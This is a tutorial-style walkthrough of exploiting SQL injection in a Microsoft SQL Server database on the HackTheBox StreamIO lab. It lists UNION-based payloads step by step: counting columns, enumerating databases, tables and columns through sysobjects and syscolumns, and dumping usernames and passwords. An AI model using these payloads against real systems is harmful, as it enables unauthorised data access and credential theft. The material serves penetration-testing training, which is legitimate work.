Microsoft SQL Injection
Introduction
Welcome to a new article, today I will show you how to exploit a SQL injection in a Microsoft database, first of all, many of the options are the same as in a normal SQL database, but the time to create and use most payloads if they have difference, but the methodology would be the same as in any other basic SQL injection.
I hope you like it and if you have any questions or contributions you can put it in the comments.
Laboratory
- StreamIO (HackTheBox)
- CheatSheet Payload All the Things
- Automate with SQLMAP
Exploitation
Detect Columns:
The first thing you have to do when you are facing a SQL Injection vulnerability is to identify the number of columns that exist in the database, to do this you would need to run the following payload:
' order by 1-- -
' order by 2-- -
' order by 3-- -
...One at a time until you get an error like this one:
This would mean that there are two columns because the third column don’t exists.
Another way to detect the number of columns is with union select, which in the case of this attack is the one we have used since the word order was inside a blacklist.
Let’s do with union select:
' union select 1-- -
' union select 1,2-- -
' union select 1,2,3-- -
...In 6 columns i see output:
Perfect the database have 6 columns and the second and third position i have the output to work.
Enumerate Database
This are the most important part from SQL Injection attack, it’s the moment to enumerate all Database, let’s start with user:
' union select 1,user_name(),3,4,5,6-- -Result:
Let’s enumerate the version:
' union select 1,@@version,3,4,5,6-- -Result:
Actual Database Name:
So far it was an enumeration that is not 100% necessary but always helps a lot, but now comes the part where you have to do all the steps to dump the data you are interested in.
' union select 1,db_name(),3,4,5,6-- -Result:
The actual database have the same name than Machine (StreamIO)
The next step is to get all the names of the databases, in this case we know that there is the one called StreamIO (because it is the one we are in), but we have to see which ones we could be interested in.
' union select 1,name,3,4,5,6 FROM master..sysdatabases-- -Result:
Perfect this is all the available databases, but there is none that catches my attention, we will keep working on StreamIO.
Tables Name:
' union select 1,name,3,4,5,6 FROM streamIO..sysobjects WHERE xtype = 'U'-- -Result:
Perfect!! Users table are interesting let’s try to find credentials, it’s moment to enumerate Columns
Columns Name:
To enumerate the columns I always recommend that in Microsoft databases you use the ID of the tables to make everything much easier, and in this case I will show you how to do it:
' union select 1,name,id,4,5,6 FROM streamIO..sysobjects WHERE xtype = 'U'-- -Result:
The ID are in the right, the last position from number 3. Now I have ID, it’s the moment to enumerate Columns from Users table.
' union select 1,name,3,4,5,6 FROM syscolumns WHERE id = 901578250 -- -Result:
Perfect!! The enumeration it’s completed i want usernames and passwords columns from users table in StreamIO Database let’s try to dump this data with the last payload:
Dump Columns
' union select 1,concat(username,':',password),3,4,5,6 FROM users-- -Result:
Microsoft SQL Injection it’s completed!
